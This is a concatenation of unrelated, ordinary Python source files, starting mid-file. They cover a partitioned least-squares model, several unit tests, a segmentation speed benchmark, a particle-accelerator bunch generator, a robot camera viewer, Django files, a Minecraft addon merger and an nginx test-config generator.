p : Matrix
specifying how to partition the M attributes into K subsets.
P{m,k} should be 1 if attribute number m belongs to partition k
Returns
-------
None.
"""
xo = hstack((x, ones((shape(x)[0], 1))))
po = vstack(
(hstack((p, zeros((shape(p)[0], 1)))), vec1(shape(p)[1] + 1)))
k = shape(po)[1]
b_start, results = (-1, [])
for i in range(b_start + 1, 2 ** k):
beta = array(indextobeta(i, k))
xb = bmatrix(xo, po, beta)
alpha = nnls(xb, y)[0]
optval = norm(xo.dot(po * alpha.reshape(-1, 1)).dot(beta) - y)
result = (optval, alpha[:-1], beta[:-1], alpha[-1] * beta[-1], p)
results.append(result)
optvals = [r[0] for r in results]
optindex = optvals.index(min(optvals))
(opt, a, b, t, p) = results[optindex]
A = sum_elements(p * a.reshape(-1, 1), 0)
b = b * A
# substituting all 0.0 with 1.0
for z in where(A == 0.0):
A[z] = 1.0
a = sum_elements((p * a.reshape(-1, 1)) / A, 1)
self.model = (opt, a, b, t, p)
def __fit_alt_nnls(self, x,
y, p,
n=20):
"""
Fits a PartialLS Alt Regression model to the given data
Parameters
----------
x : Matrix N * M
matrix describing the examples
y : vector
vector with the output values for each example
p : Matrix M * K
specifying how to partition the M attributes into K subsets.
P{m,k} should be 1 if attribute number m belongs to partition k
n : int
number of alternating loops to be performed, defaults to 20.
Returns
-------
None.
"""
# Rewriting the problem in homogenous coordinates
xo = hstack((x, ones((shape(x)[0], 1))))
po = vstack((hstack((p, zeros((shape(p)[0], 1)))),
vec1(shape(p)[1] + 1)))
m, k = shape(po)
alpha = rand(m)
beta = (rand(k) - 0.5) * 10
t = rand()
initvals = (0, alpha, beta, t, inf)
i_start, alpha, beta, t, optval = initvals
for i in range(i_start + 1, n):
# nnls problem with fixed beta variables
po_beta = sum_elements(po * beta, 1)
xo_beta = xo * po_beta
alpha = nnls(xo_beta, y)[0]
alpha = checkalpha(alpha, po)
sum_alpha = sum_elements(po * alpha.reshape(-1, 1), 0)
po_alpha = sum_elements(po * sum_alpha, 1)
alpha = alpha / po_alpha
beta = beta * sum_alpha
# ls problem with fixed alpha variables
xo_alpha = xo.dot(po * alpha.reshape(-1, 1))
beta = lstsq(xo_alpha, y, rcond=None)[0]
optval = norm(xo.dot(po * alpha.reshape(-1, 1)).dot(beta) - y, 2)
self.model = (optval, alpha[:-1], beta[:-1], alpha[-1] * beta[-1], p)
def predict(self, x):
"""
Description
Predicts points using the formula: f(X) = X * (P .* a) * b + t.
Parameters
----------
x : Matrix N * M
matrix describing the examples
Returns
-------
out : Array
contains the predictions of the given model on examples in X
"""
(_, alpha, beta, t, p) = self.model
return array(x).dot(p * alpha.reshape(-1, 1)).dot(beta) + t
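# Minimal usage sketch (not part of the original module), assuming a tiny synthetic
# problem and that the package's helper utilities behave as documented: 10 examples,
# 4 attributes split into 2 partitions of 2 attributes each.
if __name__ == '__main__':
    x_demo = rand(10, 4)
    p_demo = array([[1, 0], [1, 0], [0, 1], [0, 1]])
    y_demo = x_demo.sum(axis=1)
    model = PartitionedLs(algorithm="alt")
    model.fit(x_demo, y_demo, p_demo)
    print(model.predict(x_demo))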
|
python
|
import logging
from source.bridgeLogger import configureLogging
from nose2.tools.such import helper as assert_helper
def test_case01():
with assert_helper.assertRaises(TypeError):
configureLogging()
def test_case02():
with assert_helper.assertRaises(TypeError):
configureLogging('/tmp')
def test_case03():
with assert_helper.assertRaises(TypeError):
configureLogging(None, 'myLog')
def test_case04():
result = configureLogging('/tmp', 'mylog', 'abc')
assert isinstance(result, logging.Logger)
def test_case05():
result = configureLogging('/tmp', None, 'abc')
assert isinstance(result, logging.Logger)
def test_case06():
result = configureLogging('/tmp', None)
assert isinstance(result, logging.Logger)
|
python
|
import unittest
from imdb_app_data.moviemodel import MovieModel
from imdb_app_logic.movie_scraper import MovieScraper
from imdb_app_logic.ratingcalculator import RatingCalculator
class Test(unittest.TestCase):
def test_scraper(self):
scraper = MovieScraper()
scraper.get_movie_list()
#self.assertIsNotNone(scraper.topmovies)
self.assertTrue(len(scraper.topmovies) == 20)
def test_oscar_calculator(self):
test_movie = MovieModel(1,"TEST",5,20000,2,"TEST")
test_list = [test_movie]
rc = RatingCalculator()
rc.calculate_oscar_rating(test_list)
self.assertTrue(test_list[0].adjusted_rating == 5.3)
def test_review_penalizer(self):
test_movie = MovieModel(1,"TEST",5,200000,2,"TEST")
test_list = [test_movie]
rc = RatingCalculator()
rc.maxreviews = 500000
rc.review_penalizer(test_list)
self.assertTrue(test_list[0].adjusted_rating == 4.7)
if __name__ == "__main__":
unittest.main()
# python -m unittest unit_tests.py
|
python
|
from docker import DockerClient
from pytest import fixture
from yellowbox.clients import open_docker_client
@fixture(scope="session")
def docker_client() -> DockerClient:
with open_docker_client() as client:
yield client
|
python
|
def flow_control(k):
if (k == 0):
s = "Variable k = %d equals 0." % k
elif (k == 1):
s = "Variable k = %d equals 1." % k
else:
s = "Variable k = %d does not equal 0 or 1." % k
print(s)
def main():
i = 0
flow_control(i)
i = 1
flow_control(i)
i = 2
flow_control(i)
if __name__ == "__main__":
main()
|
python
|
# Copyright 2012 Philip Chimento
"""Sound the system bell, Qt implementation."""
from pyface.qt import QtGui
def beep():
"""Sound the system bell."""
QtGui.QApplication.beep()
|
python
|
"""
agenda:
1. speedup visualize_result
2. grouping labels
speed bottlenecks:
1. colorEncoding
results:
1. with visualize_result optimize: 0.045s --> 0.002s
2. with grouping labels: 0.002s --> 0.002-0.003s
"""
import os
import sys
import time
PATH = os.path.join(os.getcwd(), '..')
sys.path.append(PATH)
import csv
import numpy as np
import torch
from torchvision import transforms
import cv2
from img_utils import ImageLoad_cv2
from scipy.io import loadmat
from utils import colorEncode
from inference import predict, setup_model
from lib.utils import as_numpy
from profiler import profile
from idx_utils import create_idx_group, edit_colors_names_group
def preprocess():
WIDTH = 484
HEIGHT = 240
ENSEMBLE_N = 3
# GET COLOR ENCODING AND ITS INDEX MAPPING
colors = loadmat('../data/color150.mat')['colors']
root = '..'
names = {}
with open('../data/object150_info.csv') as f:
reader = csv.reader(f)
next(reader)
for row in reader:
names[int(row[0])] = row[5].split(";")[0]
idx_map = create_idx_group()
colors, names = edit_colors_names_group(colors, names)
# SETUP MODEL
cfg_path = os.path.join('..', 'config', 'ade20k-mobilenetv2dilated-c1_deepsup.yaml')
#cfg_path="config/ade20k-resnet18dilated-ppm_deepsup.yaml"
model = setup_model(cfg_path, root, gpu=0)
model.eval()
# GET DATA AND PROCESS IMAGE
data = np.load(os.path.join('..', 'test_set', 'cls1_rgb.npy'))
data = data[:, :, ::-1]
img = ImageLoad_cv2(data, WIDTH, HEIGHT, ENSEMBLE_N, True)
# MODEL FEED
predictions = predict(model, img, ENSEMBLE_N, gpu = 0, is_silent = False)
return predictions, colors, names, idx_map
def process_predict_bad(scores, colors, names, idx_map, is_silent):
"""
colorEncode is used
input:
the predictions of model
output:
the colorize predictions
"""
_, pred = torch.max(scores, dim=1)
pred = as_numpy(pred.squeeze(0).cpu()) # shape of pred is (height, width)
#The predictions for infering distance
#seg = np.moveaxis(pred, 0, -1)
pred = idx_map[pred]
    pred = np.int32(pred)
pred_color = colorEncode(pred, colors).astype(np.uint8)
if is_silent:
return pred_color
pixs = pred.size
uniques, counts = np.unique(pred, return_counts = True)
for idx in np.argsort(counts)[::-1]:
name = names[uniques[idx] + 1]
ratio = counts[idx] / pixs * 100
if ratio > 0.1:
print(" {}: {:.2f}%".format(name, ratio))
return pred_color
def process_predict_good(scores, colors, names, idx_map, is_silent):
"""
replace colorEncode by numpy way
input:
the predictions of model
output:
the colorize predictions
"""
_, pred = torch.max(scores, dim=1)
pred = as_numpy(pred.squeeze(0).cpu()) # shape of pred is (height, width)
#The predictions for infering distance
pred = idx_map[pred]
pred = np.int32(pred)
pred_color = rock_the_colorencoding(pred, colors)
if is_silent:
return pred_color
pixs = pred.size
uniques, counts = np.unique(pred, return_counts = True)
for idx in np.argsort(counts)[::-1]:
name = names[uniques[idx] + 1]
ratio = counts[idx] / pixs * 100
if ratio > 0.1:
print(" {}: {:.2f}%".format(name, ratio))
return pred_color
def rock_the_colorencoding(labelmap, colors):
return colors[labelmap]
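# colors[labelmap] relies on numpy fancy indexing: indexing the (num_classes, 3) palette
# with an (H, W) integer label map returns the (H, W, 3) color image in one vectorized
# lookup, which is what removes the per-pixel overhead of colorEncode.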
if __name__ == '__main__':
# COLOR ENCODING
import matplotlib.pyplot as plt
predictions, colors, names, idx_map = preprocess()
print('Comparing Two Ways of Color Encoding...')
for i in range(5):
# bad: use colorEncode
torch.cuda.synchronize()
start = time.time()
pred_color_orig = process_predict_bad(predictions, colors, names, idx_map, is_silent = True)
torch.cuda.synchronize()
end = time.time()
print('Original Runtime: {}s'.format(end - start))
# good: replace by numpy lookup
torch.cuda.synchronize()
start = time.time()
pred_color_gd = process_predict_good(predictions, colors, names, idx_map, is_silent = True)
torch.cuda.synchronize()
end = time.time()
print('Improved Runtime: {}s'.format(end - start))
assert (pred_color_gd == pred_color_orig).all(), 'SOMETHING WRONG WITH NEW COLOR ENCODING'
plt.imshow(pred_color_gd)
plt.show()
|
python
|
#!/usr/bin/env python
#--------------------------------------------------------
# The classes will generates bunches for pyORBIT J-PARC linac
# at the entrance of LI_MEBT1 accelerator line (by default)
# It is parallel, but it is not efficient.
#--------------------------------------------------------
import math
import sys
import os
import random
import orbit_mpi
from orbit_mpi import mpi_comm
from orbit_mpi import mpi_datatype
from orbit_mpi import mpi_op
from orbit.bunch_generators import TwissContainer
from orbit.bunch_generators import KVDist2D, KVDist3D
from orbit.bunch_generators import GaussDist2D, GaussDist3D
from orbit.bunch_generators import WaterBagDist2D, WaterBagDist3D
from orbit.bunch_generators import TwissAnalysis
from bunch import Bunch
class JPARC_Linac_BunchGenerator:
"""
Generates the pyORBIT JPARC Linac Bunches.
Twiss parameters has the following units: x in [m], xp in [rad]
and the X and Y emittances are un-normalized. The longitudinal emittance
is in [GeV*m].
"""
def __init__(self,twissX, twissY, twissZ, frequency = 324.0e+6):
self.twiss = (twissX, twissY, twissZ)
self.bunch_frequency = frequency
self.bunch = Bunch()
syncPart = self.bunch.getSyncParticle()
#set H- mass
#self.bunch.mass(0.9382723 + 2*0.000511)
self.bunch.mass(0.939294)
self.bunch.charge(-1.0)
syncPart.kinEnergy(0.003)
self.c = 2.99792458e+8 # speed of light in m/sec
self.beam_current = 40.0 # beam current in mA
self.rf_wave_lenght = self.c/self.bunch_frequency
self.si_e_charge = 1.6021773e-19
def getKinEnergy(self):
"""
Returns the kinetic energy in GeV
"""
return self.bunch.getSyncParticle().kinEnergy()
def setKinEnergy(self, e_kin = 0.003):
"""
Sets the kinetic energy in GeV
"""
self.bunch.getSyncParticle().kinEnergy(e_kin)
def getZtoPhaseCoeff(self,bunch):
"""
Returns the coefficient to calculate phase in degrees from the z-coordinate.
"""
bunch_lambda = bunch.getSyncParticle().beta()*self.rf_wave_lenght
phase_coeff = 360./bunch_lambda
return phase_coeff
def getBeamCurrent(self):
"""
Returns the beam currect in mA
"""
return self.beam_current
def setBeamCurrent(self, current):
"""
Sets the beam currect in mA
"""
self.beam_current = current
def getBunch(self, nParticles = 0, distributorClass = WaterBagDist3D, cut_off = -1.):
"""
Returns the pyORBIT bunch with particular number of particles.
"""
comm = orbit_mpi.mpi_comm.MPI_COMM_WORLD
rank = orbit_mpi.MPI_Comm_rank(comm)
size = orbit_mpi.MPI_Comm_size(comm)
data_type = mpi_datatype.MPI_DOUBLE
main_rank = 0
bunch = Bunch()
self.bunch.copyEmptyBunchTo(bunch)
macrosize = (self.beam_current*1.0e-3/self.bunch_frequency)
macrosize /= (math.fabs(bunch.charge())*self.si_e_charge)
distributor = None
if(distributorClass == WaterBagDist3D):
distributor = distributorClass(self.twiss[0],self.twiss[1],self.twiss[2])
else:
distributor = distributorClass(self.twiss[0],self.twiss[1],self.twiss[2], cut_off)
bunch.getSyncParticle().time(0.)
for i in range(nParticles):
(x,xp,y,yp,z,dE) = distributor.getCoordinates()
(x,xp,y,yp,z,dE) = orbit_mpi.MPI_Bcast((x,xp,y,yp,z,dE),data_type,main_rank,comm)
if(i%size == rank):
bunch.addParticle(x,xp,y,yp,z,dE)
nParticlesGlobal = bunch.getSizeGlobal()
bunch.macroSize(macrosize/nParticlesGlobal)
return bunch
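# Minimal usage sketch (not part of the original module). The Twiss values below are
# purely illustrative, not J-PARC design parameters; arguments are (alpha, beta, emittance)
# and running it requires a working pyORBIT/MPI environment.
if __name__ == "__main__":
    twiss_x = TwissContainer(-1.9, 0.19, 0.21e-6)
    twiss_y = TwissContainer(1.7, 0.17, 0.23e-6)
    twiss_z = TwissContainer(0.0, 0.6, 0.4e-6)
    bunch_gen = JPARC_Linac_BunchGenerator(twiss_x, twiss_y, twiss_z)
    test_bunch = bunch_gen.getBunch(nParticles = 1000)
    print("macro-particles generated: %d" % test_bunch.getSizeGlobal())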
|
python
|
import excursion
import excursion.testcases.fast as scandetails
import excursion.optimize
import numpy as np
import logging
def test_2d():
scandetails.truth_functions = [
scandetails.truth,
]
N_INIT = 5
N_UPDATES = 1
N_BATCH = 5
N_DIM = 2
X,y_list, gps = excursion.optimize.init(scandetails, n_init = N_INIT, seed = 1)
index = 0
for index in range(1,N_UPDATES+1):
newX, acqvals = excursion.optimize.gridsearch(gps, X, scandetails, batchsize=N_BATCH)
newys_list = [func(np.asarray(newX)) for func in scandetails.truth_functions]
for i,newys in enumerate(newys_list):
y_list[i] = np.concatenate([y_list[i],newys])
X = np.concatenate([X,newX])
gps = [excursion.get_gp(X,y_list[i]) for i in range(len(scandetails.truth_functions))]
print(X,X.shape)
assert X.shape == (N_INIT + N_BATCH * N_UPDATES,N_DIM)
assert np.allclose(X[0],[6.25533007e-01, 1.08048674e+00])
|
python
|
#!/usr/bin/env python3
import time
import sys
import zmq
import numpy as np
import pyglet
from ctypes import byref, POINTER
from pyglet.gl import *
from pyglet.window import key
window = pyglet.window.Window(640, 640, style=pyglet.window.Window.WINDOW_STYLE_DIALOG)
def recv_array(socket):
"""
Receive a numpy array over zmq
"""
md = socket.recv_json()
msg = socket.recv(copy=True, track=False)
buf = memoryview(msg)
A = np.frombuffer(buf, dtype=md['dtype'])
A = A.reshape(md['shape'])
return A
def update(dt):
# Get an image from the camera
print('requesting image')
global last_img
socket.send_json({ 'robot': { 'get_image': None }})
last_img = recv_array(socket)
print('img received')
def step(vels, pos=None):
global last_img
req = {
"set_vels": vels,
#"get_image": None
}
    if pos is not None:
req['set_pos'] = pos
socket.send_json({"robot": req})
@window.event
def on_key_press(symbol, modifiers):
"""
if symbol == key.BACKSPACE or symbol == key.SLASH:
print('RESET')
env.reset()
env.render('pyglet')
return
"""
if symbol == key.ESCAPE:
sys.exit(0)
@window.event
def on_key_release(symbol, modifiers):
pass
@window.event
def on_draw():
img_height, img_width, _ = last_img.shape
# Draw the human render to the rendering window
img = np.ascontiguousarray(np.flip(last_img, axis=0))
img_data = pyglet.image.ImageData(
img_width,
img_height,
'RGB',
img.ctypes.data_as(POINTER(GLubyte)),
pitch=img_width * 3,
)
img_data.blit(
0,
0,
0,
width=window.width,
height=window.height
)
# Force execution of queued commands
glFlush()
@window.event
def on_close():
pyglet.app.exit()
# Connect to the Gym bridge ROS node
addr_str = "tcp://%s:%s" % ('flogo.local', 5858)
#addr_str = "tcp://%s:%s" % ('localhost', 5858)
print("Connecting to %s ..." % addr_str)
context = zmq.Context()
socket = context.socket(zmq.PAIR)
socket.connect(addr_str)
last_img = np.zeros(shape=(64, 64, 3), dtype=np.uint8)
last_img[:, :, 0] = 255
pyglet.clock.schedule_interval(update, 1/30.0)
pyglet.app.run()
|
python
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.mainpage_sec, name='index'),
path('authorize_ingress_sec', views.authorize_ingress_sec, name='authorize_ingress'),
    path('revoke_ingress_sec', views.revoke_ingress_sec, name='revoke_ingress')
]
|
python
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Block',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=1000, verbose_name='\u540d\u5b57')),
('desc', models.CharField(max_length=1000, verbose_name='\u63cf\u8ff0')),
('create_time', models.DateTimeField(auto_now_add=True)),
('update_time', models.DateTimeField(auto_now=True)),
('manger', models.ForeignKey(verbose_name='\u7ba1\u7406\u5458', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': '\u677f\u5757',
'verbose_name_plural': '\u677f\u5757',
},
),
]
|
python
|
import json
import os
import shutil
from os import listdir
from os import path
from os.path import isfile, join
from zipfile import ZipFile
from shutil import copyfile
from glob import glob
import ntpath
import threading
import re
def find_all(name, path):
result = []
for root, dirs, files in os.walk(path):
if name in files:
result.append(os.path.join(root, name))
return result
def addDeathCounter(path_to_bp):
copy_ac(path_to_bp,"death_counter_j5cfmnkccwt7ppim3lsyue.json")
copy_animation(path_to_bp,"death_counter_start_j5cfmnkccwt7ppim3lsyue.json")
add_a_c_to_player(path_to_bp,
"controller.animation.death_counter_j5cfmnkccwt7ppim3lsyue",
"death_counter_j5cfmnkccwt7ppim3lsyue")
add_a_c_to_player(path_to_bp,
"animation.start_death_counter_j5cfmnkccwt7ppim3lsyue",
"start_death_counter_j5cfmnkccwt7ppim3lsyue")
def addWeatherClear(path_to_bp):
copy_ac(path_to_bp,"clear_weather_out_of_bed_njorunnb628pievrfeckwx.json")
add_a_c_to_player(path_to_bp,
"controller.animation.clear_weather_out_of_bed_njorunnb628pievrfeckwx",
"clear_weather_id_out_of_bed_njorunnb628pievrfeckwx")
def addOPS(path_to_bp):
copy_ac(path_to_bp,"one_player_sleep_njorunnb628pievrfeckwx.json")
add_a_c_to_player(path_to_bp,
"controller.animation.one_player_sleep_njorunnb628pievrfeckwx",
"one_player_sleep_njorunnb628pievrfeckwx")
def copy_ac(path_to_bp,ac_name):
path_to_a_c=join(path_to_bp,"animation_controllers")
if not(os.path.isdir(path_to_a_c)):
os.mkdir(path_to_a_c)
copyfile(join("lookups",ac_name),join(path_to_a_c,ac_name))
def copy_animation(path_to_bp,ani_name):
path_to_animations=join(path_to_bp,"animations")
if not(os.path.isdir(path_to_animations)):
os.mkdir(path_to_animations)
copyfile(join("lookups",ani_name),join(path_to_animations,ani_name))
def add_a_c_to_player(path_to_bp,a_c_handle,ac_common_handle,addtoscript=True):
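    # Walk every JSON file in the behaviour pack, strip // comments, and look for the
    # minecraft:player entity definition; when found, register the animation controller
    # under description.animations (and description.scripts.animate when addtoscript is
    # True). If no player entity exists, copy the stock player.json from lookups instead.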
result = [y for x in os.walk(path_to_bp) for y in glob(os.path.join(x[0], '*.json'))]
found=False
for file in result:
print(file)
with open(file, 'r+') as f:
data=""
for line in f:
data+=line
data=re.sub("\/\/[^\n]*\n", '', data )
data = json.loads(data)
if type(data) is dict:
if "minecraft:entity" in data.keys():
if data["minecraft:entity"]["description"]["identifier"]=="minecraft:player":
found=True
if "scripts" not in data["minecraft:entity"]["description"].keys() and addtoscript:
data["minecraft:entity"]["description"]["scripts"]={"animate":[]}
if "animations" not in data["minecraft:entity"]["description"].keys():
data["minecraft:entity"]["description"]["animations"]={}
if addtoscript:
data["minecraft:entity"]["description"]["scripts"]["animate"].append(ac_common_handle)
data["minecraft:entity"]["description"]["animations"][ac_common_handle]=a_c_handle
f.seek(0)
json.dump(data, f, indent=4)
f.truncate()
print(found)
if not found:
path_to_a_c=join(path_to_bp,"entities")
if not(os.path.isdir(path_to_a_c)):
os.mkdir(path_to_a_c)
copyfile(join("lookups","player.json"),join(path_to_a_c,"player.json"))
copy_ac(path_to_bp,"one_player_sleep_njorunnb628pievrfeckwx.json")
def edit_manifests(path_to_bp , packs):
with open(join(path_to_bp,"manifest.json"), 'r+') as f:
data = json.load(f)
data["header"]["description"]+=", modified by a RavinMaddHatters pack merge tool to include: {}".format(packs)
f.seek(0)
json.dump(data, f, indent=4)
f.truncate()
def mergePacks(path,death=False,ops=False,clearWeather=False):
cwd = os.getcwd()
path_to_save="temp"
with ZipFile(path, 'r') as zipObj:
zipObj.extractall(path_to_save)
manifests=find_all("manifest.json",path_to_save)
path_to_bp=""
for mani in manifests:
with open(mani) as f:
packmani = json.load(f)
for sub in packmani["modules"]:
if "data"== sub["type"]:
path_to_bp=os.path.dirname(mani)
pack =""
if clearWeather:
addWeatherClear(path_to_bp)
if death:
addDeathCounter(path_to_bp)
pack+="Death Counter"
if ops:
if len(pack)>0:
pack+=", "
pack+="One player sleep"
addOPS(path_to_bp)
if death or ops:
edit_manifests(path_to_bp,pack)
temp_path=join(cwd,path_to_save)
os.chdir(temp_path)
pack_name=ntpath.basename(path)
file_paths = []
for directory,_,_ in os.walk(temp_path):
files=glob(os.path.join(directory, "*.*"))
for file in files:
print(os.getcwd())
print(file)
file_paths.append(file.replace(os.getcwd()+"\\",""))
with ZipFile(pack_name, 'x') as zip:
for file in file_paths:
print(file)
zip.write(file)
os.chdir(cwd)
copyfile(join(path_to_save,pack_name),"merged_"+pack_name)
shutil.rmtree(path_to_save)
print("packs have been merged and processing is completed, please use merged_"+pack_name)
def loadJsonKillComments(jsonFile):
data=""
with open(jsonFile, 'r+') as f:
for line in f:
data+=line
        data = re.sub(r"//[^\n]*\n", '', data)
data = json.loads(data)
return data
def get_recursively(search_dict, field):
"""
Takes a dict with nested lists and dicts,
and searches all dicts for a key of the field
provided.
"""
fields_found = []
keys=[]
for key, value in search_dict.items():
if key == field:
fields_found.append(value)
keys.append([key])
elif isinstance(value, dict):
results,recurKeys = get_recursively(value, field)
for result in results:
fields_found.append(result)
for recurKey in recurKeys:
tempKey=[key]
tempKey+=recurKey
keys.append(tempKey)
elif isinstance(value, list):
for ind in range(len(value)):
item=value[ind]
if isinstance(item, dict):
more_results,more_recurKeys = get_recursively(item, field)
for another_result in more_results:
fields_found.append(another_result)
for more_recurkey in more_recurKeys:
tempKey=[ind]
tempKey+=more_recurkey
keys.append(tempKey)
return fields_found, keys
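# Illustrative sketch (not part of the original tool, input is made up): get_recursively
# returns the matching values plus the key paths that lead to them, e.g.
#   get_recursively({"a": {"identifier": "x"}, "b": [{"identifier": "y"}]}, "identifier")
#   -> (["x", "y"], [["a", "identifier"], [0, "identifier"]])
# Note that entries found inside lists record only the list index, not the parent key.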
def check_compatiblity(Base,Cross):
path_to_base="base"
path_to_cross="Cross"
with ZipFile(Base, 'r') as zipObj:
zipObj.extractall(path_to_base)
with ZipFile(Cross, 'r') as zipObj:
zipObj.extractall(path_to_cross)
result = [y for x in os.walk(path_to_base) for y in glob(os.path.join(x[0], '*.json'))]
base_handles=[]
for file in result:
print(file)
data=loadJsonKillComments(file)
try:
fields_found, keys=get_recursively(data,"identifier")
except:
fields_found=[]
keys=[]
base_handles+=fields_found
result2 = [y for x in os.walk(path_to_cross) for y in glob(os.path.join(x[0], '*.json'))]
cross_handles=[]
for file in result2:
print(file)
data=loadJsonKillComments(file)
try:
fields_found, keys=get_recursively(data,"identifier")
except:
fields_found=[]
keys=[]
cross_handles+=fields_found
print(base_handles)
print(cross_handles)
shutil.rmtree(path_to_base)
shutil.rmtree(path_to_cross)
return set(base_handles).intersection(set(cross_handles))
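# Hedged usage note (file names and result are assumptions for illustration only):
# check_compatiblity returns the set of "identifier" values present in both packs, e.g.
#   check_compatiblity("base.mcaddon", "other.mcaddon") -> {"minecraft:player"}
# when both packs ship a modified player entity; an empty set suggests no direct clash.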
if __name__ == "__main__":
from tkinter import ttk
from tkinter import filedialog
from tkinter import messagebox
from tkinter import StringVar, Button, Label, Entry, Tk, Checkbutton, END, ACTIVE
from tkinter import filedialog, Scale,DoubleVar,HORIZONTAL,IntVar,Listbox, ANCHOR
def browsepack():
#browse for a structure file.
packPath.set(filedialog.askopenfilename(filetypes=(
("addon", "*.mcaddon *.MCADDON *.MCPACK *mcpack"),("zip", "*.zip *.ZIP") )))
def make_pack_from_gui():
mergePacks(packPath.get(),
death=death_counter_check.get(),
ops=ops_counter_check.get(),
clearWeather=clear_counter_check.get())
def crossCheckPacksGui():
base_pack=packPath.get()
if len(base_pack)>0:
cross_pack=(filedialog.askopenfilename(filetypes=(
("Addon to Cross Check", "*.mcaddon *.MCADDON *.MCPACK *.MCPACK" ),("zip", "*.zip *.ZIP") )))
intersections=check_compatiblity(base_pack,cross_pack)
print(intersections)
if len(intersections)!=0:
printInt="\n".join(intersections)
messagebox.showerror("Not Compatible","The two packs are not compatible because they both modify the following game features: \n{}".format(printInt))
else:
messagebox.showinfo("Compatible","The two packs are likely compatible")
else:
messagebox.showerror("No Base Pack", "You must first select a base pack to check compatiblity")
root = Tk()
root.title("Addon Checker")
core_pack=Label(root, text="Core Pack")
add_ins=Label(root, text="Common Additions (will be added to the core pack):")
death_counter_check = IntVar()
ops_counter_check = IntVar()
clear_counter_check = IntVar()
packPath = StringVar()
death_check = Checkbutton(root, text="Death Counter", variable=death_counter_check, onvalue=1, offvalue=0)
ops_check = Checkbutton(root, text="One Player Sleep", variable=ops_counter_check, onvalue=1, offvalue=0)
clear_check = Checkbutton(root, text="One player sleep with clear weather", variable=clear_counter_check, onvalue=1, offvalue=0)
browsButton = Button(root, text="Browse", command=browsepack)
packButton = Button(root, text="Merge in Packs", command=make_pack_from_gui)
Cross_check = Button(root, text="Cross Check a Pack", command=crossCheckPacksGui)
path_entry = Entry(root, textvariable=packPath, width=30)
r=0
core_pack.grid(row=r, column=0,columnspan=2)
r+=1
path_entry.grid(row=r, column=0)
browsButton.grid(row=r, column=1)
r+=1
add_ins.grid(row=r, column=0,columnspan=2)
r+=1
death_check.grid(row=r, column=0,columnspan=2)
r+=1
ops_check.grid(row=r, column=0,columnspan=2)
r+=1
clear_check.grid(row=r, column=0,columnspan=2)
r+=1
Cross_check.grid(row=r, column=0)
packButton.grid(row=r, column=1)
root.mainloop()
root.quit()
|
python
|
__author__ = 'Sergei'
from model.contact import Contact
from random import randrange
def test_del_contact(app):
if app.contact.count() == 0:
app.contact.create_c(Contact(first_n= "first",mid_n= "middle",last_n= "last",nick_n= "kuk",company= "adda",address= "575 oiweojdckjgsd,russia",home_ph= "12134519827",
cell_ph= "120092340980",email= "[email protected]"))
old_contact = app.contact.get_contact_list()
index = randrange(len(old_contact))
app.contact.contact_delete_by_index(index)
new_contact = app.contact.get_contact_list()
assert len(old_contact) - 1 == len(new_contact)
old_contact[index:index+1] = []
assert old_contact == new_contact
|
python
|
# -*- coding: utf-8 -*-
"""General purpose nginx test configuration generator."""
import getpass
from typing import Optional
import pkg_resources
def construct_nginx_config(nginx_root: str, nginx_webroot: str, http_port: int, https_port: int,
other_port: int, default_server: bool, key_path: Optional[str] = None,
cert_path: Optional[str] = None, wtf_prefix: str = 'le') -> str:
"""
This method returns a full nginx configuration suitable for integration tests.
:param str nginx_root: nginx root configuration path
:param str nginx_webroot: nginx webroot path
:param int http_port: HTTP port to listen on
:param int https_port: HTTPS port to listen on
:param int other_port: other HTTP port to listen on
:param bool default_server: True to set a default server in nginx config, False otherwise
:param str key_path: the path to a SSL key
:param str cert_path: the path to a SSL certificate
:param str wtf_prefix: the prefix to use in all domains handled by this nginx config
:return: a string containing the full nginx configuration
:rtype: str
"""
key_path = key_path if key_path \
else pkg_resources.resource_filename('certbot_integration_tests', 'assets/key.pem')
cert_path = cert_path if cert_path \
else pkg_resources.resource_filename('certbot_integration_tests', 'assets/cert.pem')
return '''\
# This error log will be written regardless of server scope error_log
# definitions, so we have to set this here in the main scope.
#
# Even doing this, Nginx will still try to create the default error file, and
# log a non-fatal error when it fails. After that things will work, however.
error_log {nginx_root}/error.log;
# The pidfile will be written to /var/run unless this is set.
pid {nginx_root}/nginx.pid;
user {user};
worker_processes 1;
events {{
worker_connections 1024;
}}
# “This comment contains valid Unicode”.
http {{
# Set an array of temp, cache and log file options that will otherwise default to
# restricted locations accessible only to root.
client_body_temp_path {nginx_root}/client_body;
fastcgi_temp_path {nginx_root}/fastcgi_temp;
proxy_temp_path {nginx_root}/proxy_temp;
#scgi_temp_path {nginx_root}/scgi_temp;
#uwsgi_temp_path {nginx_root}/uwsgi_temp;
access_log {nginx_root}/error.log;
# This should be turned off in a Virtualbox VM, as it can cause some
# interesting issues with data corruption in delivered files.
sendfile off;
tcp_nopush on;
tcp_nodelay on;
keepalive_timeout 65;
types_hash_max_size 2048;
#include /etc/nginx/mime.types;
index index.html index.htm index.php;
log_format main '$remote_addr - $remote_user [$time_local] $status '
'"$request" $body_bytes_sent "$http_referer" '
'"$http_user_agent" "$http_x_forwarded_for"';
default_type application/octet-stream;
server {{
# IPv4.
listen {http_port} {default_server};
# IPv6.
listen [::]:{http_port} {default_server};
server_name nginx.{wtf_prefix}.wtf nginx2.{wtf_prefix}.wtf;
root {nginx_webroot};
location / {{
# First attempt to serve request as file, then as directory, then fall
# back to index.html.
try_files $uri $uri/ /index.html;
}}
}}
server {{
listen {http_port};
listen [::]:{http_port};
server_name nginx3.{wtf_prefix}.wtf;
root {nginx_webroot};
location /.well-known/ {{
return 404;
}}
return 301 https://$host$request_uri;
}}
server {{
listen {other_port};
listen [::]:{other_port};
server_name nginx4.{wtf_prefix}.wtf nginx5.{wtf_prefix}.wtf;
}}
server {{
listen {http_port};
listen [::]:{http_port};
listen {https_port} ssl;
listen [::]:{https_port} ssl;
if ($scheme != "https") {{
return 301 https://$host$request_uri;
}}
server_name nginx6.{wtf_prefix}.wtf nginx7.{wtf_prefix}.wtf;
ssl_certificate {cert_path};
ssl_certificate_key {key_path};
}}
}}
'''.format(nginx_root=nginx_root, nginx_webroot=nginx_webroot, user=getpass.getuser(),
http_port=http_port, https_port=https_port, other_port=other_port,
